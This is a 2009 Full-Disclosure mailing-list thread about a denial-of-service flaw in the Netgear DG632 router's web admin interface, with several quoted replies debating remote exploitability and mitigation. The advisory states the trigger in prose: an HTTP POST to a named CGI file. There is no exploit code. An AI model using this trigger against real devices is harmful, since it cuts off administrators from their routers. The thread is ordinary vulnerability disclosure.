I know and I understand. What I wanted to mean is that we can not eventually acces to the web interface of a netgear router remotely if we cannot localy. As for the DoS, it is simple to solve such attack from outside. We just disable receiving pings (There is actually an option in even the lowest series) and thus, we would be able to have a remote management without ICMP requests. 2009/6/15 Tom Neaves > Hi. > > I'm not quite sure of your question... > > The DoS can be carried out remotely, however one mitigating factor (which > makes it a low risk as opposed to sirens and alarms...) is that its turned > off by default - you have to explicitly enable it under "Remote Management" > on the device if you want to access it/carry out the DoS over the Internet. > However, it is worth noting that anyone on your LAN can *remotely* carry out > this attack regardless of this management feature being on/off. > > I hope this clarifies it for you. > > Tom > > - Original Message - > *From:* Alaa El yazghi > *To:* Tom Neaves > *Cc:* bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk > *Sent:* Monday, June 15, 2009 10:45 PM > *Subject:* Re: Netgear DG632 Router Remote DoS Vulnerability > > How can it be carried out remotely if it bugs localy? > > 2009/6/15 Tom Neaves > >> Product Name: Netgear DG632 Router >> Vendor: http://www.netgear.com >> Date: 15 June, 2009 >> Author: t...@tomneaves.co.uk >> Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt >> Discovered: 18 November, 2006 >> Disclosed: 15 June, 2009 >> >> I. DESCRIPTION >> >> The Netgear DG632 router has a web interface which runs on port 80. This >> allows an admin to login and administer the device's settings. However, >> a Denial of Service (DoS) vulnerability exists that causes the web >> interface >> to crash and stop responding to further requests. >> >> II. DETAILS >> >> Within the "/cgi-bin/" directory of the administrative web interface >> exists a >> file called "firmwarecfg". This file is used for firmware upgrades. A >> HTTP POST >> request for this file causes the web server to hang. The web server will >> stop >> responding to requests and the administrative interface will become >> inaccessible >> until the router is physically restarted. >> >> While the router will still continue to function at the network level, >> i.e. it will >> still respond to ICMP echo requests and issue leases via DHCP, an >> administrator will >> no longer be able to interact with the administrative web interface. >> >> This attack can be carried out internally within the network, or over the >> Internet >> if the administrator has enabled the "Remote Management" feature on the >> router. >> >> Affected Versions: Firmware V3.4.0_ap (others unknown) >> >> III. VENDOR RESPONSE >> >> 12 June, 2009 - Contacted vendor. >> 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life >> product and is no >> longer supported in a production and development sense, as such, there >> will be no further >> firmware releases to resolve this issue. >> >> IV. CREDIT >> >> Discovered by Tom Neaves >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
How can it be carried out remotely if it bugs localy? 2009/6/15 Tom Neaves > Product Name: Netgear DG632 Router > Vendor: http://www.netgear.com > Date: 15 June, 2009 > Author: t...@tomneaves.co.uk > Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt > Discovered: 18 November, 2006 > Disclosed: 15 June, 2009 > > I. DESCRIPTION > > The Netgear DG632 router has a web interface which runs on port 80. This > allows an admin to login and administer the device's settings. However, > a Denial of Service (DoS) vulnerability exists that causes the web > interface > to crash and stop responding to further requests. > > II. DETAILS > > Within the "/cgi-bin/" directory of the administrative web interface exists > a > file called "firmwarecfg". This file is used for firmware upgrades. A > HTTP POST > request for this file causes the web server to hang. The web server will > stop > responding to requests and the administrative interface will become > inaccessible > until the router is physically restarted. > > While the router will still continue to function at the network level, i.e. > it will > still respond to ICMP echo requests and issue leases via DHCP, an > administrator will > no longer be able to interact with the administrative web interface. > > This attack can be carried out internally within the network, or over the > Internet > if the administrator has enabled the "Remote Management" feature on the > router. > > Affected Versions: Firmware V3.4.0_ap (others unknown) > > III. VENDOR RESPONSE > > 12 June, 2009 - Contacted vendor. > 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life > product and is no > longer supported in a production and development sense, as such, there will > be no further > firmware releases to resolve this issue. > > IV. CREDIT > > Discovered by Tom Neaves > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Hi. I see where you're going but I think you're missing the point a little. By *default* the web interface is enabled on the LAN and accessible by anyone on that LAN and the "remote management" interface (for the Internet) is turned off. If the "remote management" interface was enabled, stopping ICMP echo responses would not resolve this issue at all, turning the interface off would do though (or restricting by IP, ...ack). The "remote management" (love those quotes...) interface speaks over HTTP hence TCP so no amount of dropping ICMP goodness will help with this. Anyhow, I am happy to discuss this off list with you if its still not clear to save spamming everyone's inboxes. :o) Tom - Original Message - From: Alaa El yazghi To: Tom Neaves Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk Sent: Monday, June 15, 2009 11:03 PM Subject: Re: Netgear DG632 Router Remote DoS Vulnerability I know and I understand. What I wanted to mean is that we can not eventually acces to the web interface of a netgear router remotely if we cannot localy. As for the DoS, it is simple to solve such attack from outside. We just disable receiving pings (There is actually an option in even the lowest series) and thus, we would be able to have a remote management without ICMP requests. 2009/6/15 Tom Neaves Hi. I'm not quite sure of your question... The DoS can be carried out remotely, however one mitigating factor (which makes it a low risk as opposed to sirens and alarms...) is that its turned off by default - you have to explicitly enable it under "Remote Management" on the device if you want to access it/carry out the DoS over the Internet. However, it is worth noting that anyone on your LAN can *remotely* carry out this attack regardless of this management feature being on/off. I hope this clarifies it for you. Tom - Original Message - From: Alaa El yazghi To: Tom Neaves Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk Sent: Monday, June 15, 2009 10:45 PM Subject: Re: Netgear DG632 Router Remote DoS Vulnerability How can it be carried out remotely if it bugs localy? 2009/6/15 Tom Neaves Product Name: Netgear DG632 Router Vendor: http://www.netgear.com Date: 15 June, 2009 Author: t...@tomneaves.co.uk Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt Discovered: 18 November, 2006 Disclosed: 15 June, 2009 I. DESCRIPTION The Netgear DG632 router has a web interface which runs on port 80. This allows an admin to login and administer the device's settings. However, a Denial of Service (DoS) vulnerability exists that causes the web interface to crash and stop responding to further requests. II. DETAILS Within the "/cgi-bin/" directory of the administrative web interface exists a file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST request for this file causes the web server to hang. The web server will stop responding to requests and the administrative interface will become inaccessible until the router is physically restarted. While the router will still continue to function at the network level, i.e. it will still respond to ICMP echo requests and issue leases via DHCP, an administrator will no longer be able to interact with the administrative web interface. This attack can be carried out internally within the network, or over the Internet if the administrator has enabled the "Remote Management" feature on the router. Affected Versions: Firmware V3.4.0_ap (others unknown) III. VENDOR RESPONSE 12 June, 2009 - Contacted vendor. 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no longer supported in a production and development sense, as such, there will be no further firmware releases to resolve this issue. IV. CREDIT Discovered by Tom Neaves ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Hi. I'm not quite sure of your question... The DoS can be carried out remotely, however one mitigating factor (which makes it a low risk as opposed to sirens and alarms...) is that its turned off by default - you have to explicitly enable it under "Remote Management" on the device if you want to access it/carry out the DoS over the Internet. However, it is worth noting that anyone on your LAN can *remotely* carry out this attack regardless of this management feature being on/off. I hope this clarifies it for you. Tom - Original Message - From: Alaa El yazghi To: Tom Neaves Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk Sent: Monday, June 15, 2009 10:45 PM Subject: Re: Netgear DG632 Router Remote DoS Vulnerability How can it be carried out remotely if it bugs localy? 2009/6/15 Tom Neaves Product Name: Netgear DG632 Router Vendor: http://www.netgear.com Date: 15 June, 2009 Author: t...@tomneaves.co.uk Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt Discovered: 18 November, 2006 Disclosed: 15 June, 2009 I. DESCRIPTION The Netgear DG632 router has a web interface which runs on port 80. This allows an admin to login and administer the device's settings. However, a Denial of Service (DoS) vulnerability exists that causes the web interface to crash and stop responding to further requests. II. DETAILS Within the "/cgi-bin/" directory of the administrative web interface exists a file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST request for this file causes the web server to hang. The web server will stop responding to requests and the administrative interface will become inaccessible until the router is physically restarted. While the router will still continue to function at the network level, i.e. it will still respond to ICMP echo requests and issue leases via DHCP, an administrator will no longer be able to interact with the administrative web interface. This attack can be carried out internally within the network, or over the Internet if the administrator has enabled the "Remote Management" feature on the router. Affected Versions: Firmware V3.4.0_ap (others unknown) III. VENDOR RESPONSE 12 June, 2009 - Contacted vendor. 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no longer supported in a production and development sense, as such, there will be no further firmware releases to resolve this issue. IV. CREDIT Discovered by Tom Neaves ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Product Name: Netgear DG632 Router Vendor: http://www.netgear.com Date: 15 June, 2009 Author: t...@tomneaves.co.uk Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt Discovered: 18 November, 2006 Disclosed: 15 June, 2009 I. DESCRIPTION The Netgear DG632 router has a web interface which runs on port 80. This allows an admin to login and administer the device's settings. However, a Denial of Service (DoS) vulnerability exists that causes the web interface to crash and stop responding to further requests. II. DETAILS Within the "/cgi-bin/" directory of the administrative web interface exists a file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST request for this file causes the web server to hang. The web server will stop responding to requests and the administrative interface will become inaccessible until the router is physically restarted. While the router will still continue to function at the network level, i.e. it will still respond to ICMP echo requests and issue leases via DHCP, an administrator will no longer be able to interact with the administrative web interface. This attack can be carried out internally within the network, or over the Internet if the administrator has enabled the "Remote Management" feature on the router. Affected Versions: Firmware V3.4.0_ap (others unknown) III. VENDOR RESPONSE 12 June, 2009 - Contacted vendor. 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no longer supported in a production and development sense, as such, there will be no further firmware releases to resolve this issue. IV. CREDIT Discovered by Tom Neaves ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/